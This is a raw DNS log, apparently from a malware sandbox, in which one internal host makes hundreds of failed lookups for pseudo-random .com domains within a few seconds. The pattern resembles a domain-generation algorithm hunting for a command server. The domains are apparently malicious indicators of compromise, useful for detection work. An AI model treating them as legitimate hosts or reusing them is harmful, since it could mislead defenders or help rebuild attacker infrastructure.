Nov 11, 2024 18:13:40.559793949 CET	1.1.1.1	192.168.2.6	0xebac	Name error (3)	gahycib.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.562025070 CET	1.1.1.1	192.168.2.6	0x2b	Name error (3)	pupylaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.563221931 CET	1.1.1.1	192.168.2.6	0xb76a	Name error (3)	vocygyk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.565130949 CET	1.1.1.1	192.168.2.6	0x2ada	Name error (3)	qekysip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.699029922 CET	1.1.1.1	192.168.2.6	0xc536	Name error (3)	vofyzym.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.879304886 CET	1.1.1.1	192.168.2.6	0x147	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.882289886 CET	1.1.1.1	192.168.2.6	0xe640	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.882989883 CET	1.1.1.1	192.168.2.6	0x6fee	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.884649992 CET	1.1.1.1	192.168.2.6	0xfa37	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.885114908 CET	1.1.1.1	192.168.2.6	0x260a	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.887087107 CET	1.1.1.1	192.168.2.6	0x81f1	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.887775898 CET	1.1.1.1	192.168.2.6	0xd154	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.895664930 CET	1.1.1.1	192.168.2.6	0x20b4	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.896040916 CET	1.1.1.1	192.168.2.6	0xf412	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.903691053 CET	1.1.1.1	192.168.2.6	0x772e	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.908438921 CET	1.1.1.1	192.168.2.6	0x1314	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.909316063 CET	1.1.1.1	192.168.2.6	0xca0a	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.910037041 CET	1.1.1.1	192.168.2.6	0x3df9	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.964214087 CET	1.1.1.1	192.168.2.6	0x6ad8	Name error (3)	lymygyx.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.965878963 CET	1.1.1.1	192.168.2.6	0x2641	Name error (3)	pumygyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.967185020 CET	1.1.1.1	192.168.2.6	0x7176	Name error (3)	qekyxul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.976047039 CET	1.1.1.1	192.168.2.6	0xdfb3	Name error (3)	puzyciq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.985989094 CET	1.1.1.1	192.168.2.6	0x6f10	Name error (3)	vofyref.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:40.996323109 CET	1.1.1.1	192.168.2.6	0xf3a4	Name error (3)	gadyrab.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.003628016 CET	1.1.1.1	192.168.2.6	0x8532	Name error (3)	pujyxyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.014291048 CET	1.1.1.1	192.168.2.6	0x28d4	Name error (3)	volycik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.014874935 CET	1.1.1.1	192.168.2.6	0xbb1d	Name error (3)	lyrymuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.014905930 CET	1.1.1.1	192.168.2.6	0x3cce	Name error (3)	ganyfes.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.015192986 CET	1.1.1.1	192.168.2.6	0xb3ee	Name error (3)	gahyzez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.024404049 CET	1.1.1.1	192.168.2.6	0x2781	Name error (3)	pupywog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.066667080 CET	1.1.1.1	192.168.2.6	0x8e78	Name error (3)	vonybat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.070216894 CET	1.1.1.1	192.168.2.6	0x8d8e	Name error (3)	pufylap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.071923018 CET	1.1.1.1	192.168.2.6	0x4462	Name error (3)	volypum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.080209970 CET	1.1.1.1	192.168.2.6	0xa7bc	Name error (3)	vonygec.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.093483925 CET	1.1.1.1	192.168.2.6	0xcb8b	Name error (3)	puvycip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.095043898 CET	1.1.1.1	192.168.2.6	0x593a	Name error (3)	qexysig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.097516060 CET	1.1.1.1	192.168.2.6	0x559	Name error (3)	puzypug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.122200012 CET	1.1.1.1	192.168.2.6	0x5a5	Name error (3)	galypyh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.123019934 CET	1.1.1.1	192.168.2.6	0xade4	Name error (3)	qedykiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.128026009 CET	1.1.1.1	192.168.2.6	0x2920	Name error (3)	lysyjid.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.129070044 CET	1.1.1.1	192.168.2.6	0xca05	Name error (3)	pumybal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.130829096 CET	1.1.1.1	192.168.2.6	0x96f3	Name error (3)	pupyjuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.132440090 CET	1.1.1.1	192.168.2.6	0x8b5d	Name error (3)	vofykoc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.132468939 CET	1.1.1.1	192.168.2.6	0x81bf	Name error (3)	galycuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.132669926 CET	1.1.1.1	192.168.2.6	0xf0	Name error (3)	qexyvoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.132682085 CET	1.1.1.1	192.168.2.6	0x4500	Name error (3)	lymyner.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.133097887 CET	1.1.1.1	192.168.2.6	0xb2ad	Name error (3)	ganyvoz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.133472919 CET	1.1.1.1	192.168.2.6	0x4a21	Name error (3)	vojyrak.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.133739948 CET	1.1.1.1	192.168.2.6	0x3083	Name error (3)	lysywon.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.134125948 CET	1.1.1.1	192.168.2.6	0x19a2	Name error (3)	lykyxur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.135909081 CET	1.1.1.1	192.168.2.6	0xefae	Name error (3)	pujyteq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.140283108 CET	1.1.1.1	192.168.2.6	0x89b7	Name error (3)	qedyrag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.141738892 CET	1.1.1.1	192.168.2.6	0x4470	Name error (3)	gadykos.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.146553040 CET	1.1.1.1	192.168.2.6	0x999e	Name error (3)	qebyvop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.146564007 CET	1.1.1.1	192.168.2.6	0x7165	Name error (3)	lyxysun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.146574020 CET	1.1.1.1	192.168.2.6	0x31a9	Name error (3)	pufytev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.147706985 CET	1.1.1.1	192.168.2.6	0xb223	Name error (3)	puvydov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.147741079 CET	1.1.1.1	192.168.2.6	0xb4db	Name error (3)	qeqyhup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.149182081 CET	1.1.1.1	192.168.2.6	0x38f8	Name error (3)	gaqyhuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.149213076 CET	1.1.1.1	192.168.2.6	0x8e51	Name error (3)	lyvyvix.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.150497913 CET	1.1.1.1	192.168.2.6	0xab36	Name error (3)	qegylep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.150536060 CET	1.1.1.1	192.168.2.6	0x9e4	Name error (3)	vojyzyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.150938988 CET	1.1.1.1	192.168.2.6	0xf7c0	Name error (3)	lygytyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.151922941 CET	1.1.1.1	192.168.2.6	0x2b37	Name error (3)	gacydib.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.151933908 CET	1.1.1.1	192.168.2.6	0xff8b	Name error (3)	qekytyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.151943922 CET	1.1.1.1	192.168.2.6	0xdebf	Name error (3)	purymuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.152756929 CET	1.1.1.1	192.168.2.6	0x262b	Name error (3)	vowyjut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.153050900 CET	1.1.1.1	192.168.2.6	0xfd2	Name error (3)	lygylax.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.154607058 CET	1.1.1.1	192.168.2.6	0x3ad6	Name error (3)	vocydof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.155848026 CET	1.1.1.1	192.168.2.6	0x5606	Name error (3)	qeqynel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.163693905 CET	1.1.1.1	192.168.2.6	0x11b5	Name error (3)	lykytej.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.168445110 CET	1.1.1.1	192.168.2.6	0x82c8	Name error (3)	gaqynyw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.169924974 CET	1.1.1.1	192.168.2.6	0xf291	Name error (3)	vopyjuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.170912981 CET	1.1.1.1	192.168.2.6	0x843b	Name error (3)	qebyfav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.171245098 CET	1.1.1.1	192.168.2.6	0xb46e	Name error (3)	lyvyfad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.171926022 CET	1.1.1.1	192.168.2.6	0x4eeb	Name error (3)	gatyqih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.172470093 CET	1.1.1.1	192.168.2.6	0x6a82	Name error (3)	lyxyvoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.173362970 CET	1.1.1.1	192.168.2.6	0x2e74	Name error (3)	vopyqim.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:41.185007095 CET	1.1.1.1	192.168.2.6	0x34e1	Name error (3)	qetyquq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.256362915 CET	1.1.1.1	192.168.2.6	0x97a3	Name error (3)	vopygat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.276710987 CET	1.1.1.1	192.168.2.6	0x8961	Name error (3)	qebyxyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.282429934 CET	1.1.1.1	192.168.2.6	0xa767	Name error (3)	puzytap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.291933060 CET	1.1.1.1	192.168.2.6	0x3b7b	Name error (3)	galyros.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.292453051 CET	1.1.1.1	192.168.2.6	0xa235	Name error (3)	gadyhyw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.298526049 CET	1.1.1.1	192.168.2.6	0xdfb0	Name error (3)	lymyvin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.313113928 CET	1.1.1.1	192.168.2.6	0xc18e	Name error (3)	lysyger.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.314977884 CET	1.1.1.1	192.168.2.6	0xf5a4	Name error (3)	volyrac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.317220926 CET	1.1.1.1	192.168.2.6	0xdcfe	Name error (3)	lykywid.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.326457024 CET	1.1.1.1	192.168.2.6	0x9398	Name error (3)	qedyhyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.327109098 CET	1.1.1.1	192.168.2.6	0x76b7	Name error (3)	pumycug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.423680067 CET	1.1.1.1	192.168.2.6	0x3002	Name error (3)	vocycuc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.438385963 CET	1.1.1.1	192.168.2.6	0x201b	Name error (3)	qeqyvig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.440241098 CET	1.1.1.1	192.168.2.6	0x7040	Name error (3)	gatynes.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.440279961 CET	1.1.1.1	192.168.2.6	0xf4f9	Name error (3)	pujylog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.440660000 CET	1.1.1.1	192.168.2.6	0xab59	Name error (3)	puvypul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.441111088 CET	1.1.1.1	192.168.2.6	0x806d	Name error (3)	qetynev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.441454887 CET	1.1.1.1	192.168.2.6	0x3084	Name error (3)	vojykom.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.441817999 CET	1.1.1.1	192.168.2.6	0xe84	Name error (3)	vopymyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.455748081 CET	1.1.1.1	192.168.2.6	0xf29a	Name error (3)	qebysul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.461927891 CET	1.1.1.1	192.168.2.6	0x904	Name error (3)	gahykih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.462321043 CET	1.1.1.1	192.168.2.6	0xd294	Name error (3)	lyvysur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.492772102 CET	1.1.1.1	192.168.2.6	0xeac5	Name error (3)	vofyqit.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.493103981 CET	1.1.1.1	192.168.2.6	0xdfec	Name error (3)	lykylan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.740917921 CET	1.1.1.1	192.168.2.6	0x17a1	Name error (3)	lygywor.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.741460085 CET	1.1.1.1	192.168.2.6	0xfbaf	Name error (3)	qegykiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.742188931 CET	1.1.1.1	192.168.2.6	0xc031	Name error (3)	qeqyfaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.742446899 CET	1.1.1.1	192.168.2.6	0x9f06	Name error (3)	pufywil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.743839979 CET	1.1.1.1	192.168.2.6	0x5333	Name error (3)	gacycus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.762056112 CET	1.1.1.1	192.168.2.6	0xaa38	Name error (3)	lygyjuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:42.763492107 CET	1.1.1.1	192.168.2.6	0xcb31	Name error (3)	purygeg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.089121103 CET	1.1.1.1	192.168.2.6	0x9313	Name error (3)	vonydik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.096586943 CET	1.1.1.1	192.168.2.6	0xbe2c	Name error (3)	pupymyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.099148035 CET	1.1.1.1	192.168.2.6	0xf14b	Name error (3)	ganydiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.100056887 CET	1.1.1.1	192.168.2.6	0xb21	Name error (3)	qexytep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.103559971 CET	1.1.1.1	192.168.2.6	0xb46f	Name error (3)	vowybof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.103774071 CET	1.1.1.1	192.168.2.6	0xec43	Name error (3)	gaqyvob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.118097067 CET	1.1.1.1	192.168.2.6	0xcf6a	Name error (3)	pupygel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.125561953 CET	1.1.1.1	192.168.2.6	0x5314	Name error (3)	gacypyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.156944036 CET	1.1.1.1	192.168.2.6	0x709c	Name error (3)	lyxyxyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.158485889 CET	1.1.1.1	192.168.2.6	0x33b5	Name error (3)	qegyrol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.158598900 CET	1.1.1.1	192.168.2.6	0xcfe8	Name error (3)	vowygem.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.159941912 CET	1.1.1.1	192.168.2.6	0x407f	Name error (3)	qexyxuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.160108089 CET	1.1.1.1	192.168.2.6	0xb88d	Name error (3)	vocypyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.160782099 CET	1.1.1.1	192.168.2.6	0xbc75	Name error (3)	vofyjuk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.160849094 CET	1.1.1.1	192.168.2.6	0x3229	Name error (3)	gahyraw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.162890911 CET	1.1.1.1	192.168.2.6	0x5ca8	Name error (3)	lymyfoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.162914991 CET	1.1.1.1	192.168.2.6	0xdbc6	Name error (3)	gadyquz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.162926912 CET	1.1.1.1	192.168.2.6	0xc49c	Name error (3)	gaqyfah.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.164588928 CET	1.1.1.1	192.168.2.6	0xfacc	Name error (3)	lysymux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.165213108 CET	1.1.1.1	192.168.2.6	0x146d	Name error (3)	lyxytex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.168684959 CET	1.1.1.1	192.168.2.6	0xe878	Name error (3)	pumydoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.173054934 CET	1.1.1.1	192.168.2.6	0xd601	Name error (3)	qedyqup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.180521965 CET	1.1.1.1	192.168.2.6	0x6e47	Name error (3)	lyrygyn.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.180531979 CET	1.1.1.1	192.168.2.6	0xa3d5	Name error (3)	qekylag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.187844992 CET	1.1.1.1	192.168.2.6	0x900c	Name error (3)	volyzef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.200258970 CET	1.1.1.1	192.168.2.6	0x7bc	Name error (3)	purybav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.200305939 CET	1.1.1.1	192.168.2.6	0x516e	Name error (3)	galyzeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.200315952 CET	1.1.1.1	192.168.2.6	0xe3a8	Name error (3)	ganycuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.201565027 CET	1.1.1.1	192.168.2.6	0x558c	Name error (3)	lyrynad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.214140892 CET	1.1.1.1	192.168.2.6	0xe34e	Name error (3)	puzyxyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.236135006 CET	1.1.1.1	192.168.2.6	0xa15f	Name error (3)	qekyrov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.263535976 CET	1.1.1.1	192.168.2.6	0xda70	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.764704943 CET	1.1.1.1	192.168.2.6	0xef86	Name error (3)	qexyriq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.766196012 CET	1.1.1.1	192.168.2.6	0xe09c	Name error (3)	vowycut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.769372940 CET	1.1.1.1	192.168.2.6	0x1dcb	Name error (3)	lygyged.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.797626019 CET	1.1.1.1	192.168.2.6	0x1f10	Name error (3)	pujywiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.806602955 CET	1.1.1.1	192.168.2.6	0x7d4	Name error (3)	gahyhys.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.820797920 CET	1.1.1.1	192.168.2.6	0x1c5a	Name error (3)	vocyrom.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.824604034 CET	1.1.1.1	192.168.2.6	0xf3cf	Name error (3)	puvytag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.839016914 CET	1.1.1.1	192.168.2.6	0xa2ed	Name error (3)	lyryvur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.846059084 CET	1.1.1.1	192.168.2.6	0xd18d	Name error (3)	qebyteg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.848967075 CET	1.1.1.1	192.168.2.6	0xb666	Name error (3)	gacyroh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.854108095 CET	1.1.1.1	192.168.2.6	0x5193	Name error (3)	vonypyf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.871083021 CET	1.1.1.1	192.168.2.6	0x1250	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.911514044 CET	1.1.1.1	192.168.2.6	0x57d	Name error (3)	pumypyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.912945032 CET	1.1.1.1	192.168.2.6	0x2378	Name error (3)	volykit.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.913697004 CET	1.1.1.1	192.168.2.6	0xa3d5	Name error (3)	lyvytan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.913718939 CET	1.1.1.1	192.168.2.6	0x6012	Name error (3)	gacyzaw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.913913965 CET	1.1.1.1	192.168.2.6	0xe4e8	Name error (3)	purydip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.936808109 CET	1.1.1.1	192.168.2.6	0xf15b	Name error (3)	qetyvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.937397003 CET	1.1.1.1	192.168.2.6	0x86d	Name error (3)	lyryfox.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.939038992 CET	1.1.1.1	192.168.2.6	0xee13	Name error (3)	pupyboq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.939704895 CET	1.1.1.1	192.168.2.6	0xbf81	Name error (3)	puzylol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.940460920 CET	1.1.1.1	192.168.2.6	0xfab9	Name error (3)	qekykup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.940471888 CET	1.1.1.1	192.168.2.6	0x55aa	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.940821886 CET	1.1.1.1	192.168.2.6	0x403b	Name error (3)	pujyjup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.942075968 CET	1.1.1.1	192.168.2.6	0x5cf5	Name error (3)	qegyqug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.942591906 CET	1.1.1.1	192.168.2.6	0x1ccd	Name error (3)	gatyviw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.945928097 CET	1.1.1.1	192.168.2.6	0x430e	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.946420908 CET	1.1.1.1	192.168.2.6	0xabd4	Name error (3)	lymysud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.948673010 CET	1.1.1.1	192.168.2.6	0x54a9	Name error (3)	gaqycyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.950637102 CET	1.1.1.1	192.168.2.6	0x1fd5	Name error (3)	vojyjyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.956274033 CET	1.1.1.1	192.168.2.6	0x708b	Name error (3)	vocyzek.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.957992077 CET	1.1.1.1	192.168.2.6	0x1fac	Name error (3)	qedyfog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.958564043 CET	1.1.1.1	192.168.2.6	0x945a	Name error (3)	vopybok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.958575010 CET	1.1.1.1	192.168.2.6	0xe775	Name error (3)	galykiz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.959060907 CET	1.1.1.1	192.168.2.6	0xf3bd	Name error (3)	purycul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.960223913 CET	1.1.1.1	192.168.2.6	0xaa63	Name error (3)	lysyfin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.960235119 CET	1.1.1.1	192.168.2.6	0x3b5e	Name error (3)	ganypeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.961102009 CET	1.1.1.1	192.168.2.6	0x1800	Name error (3)	lykyjux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.961112976 CET	1.1.1.1	192.168.2.6	0x33c4	Name error (3)	galyquw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.961376905 CET	1.1.1.1	192.168.2.6	0x93d8	Name error (3)	puzywuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.961954117 CET	1.1.1.1	192.168.2.6	0xaab3	Name error (3)	vofymem.com	none	none	A (IP address)	IN (0x0001)	false
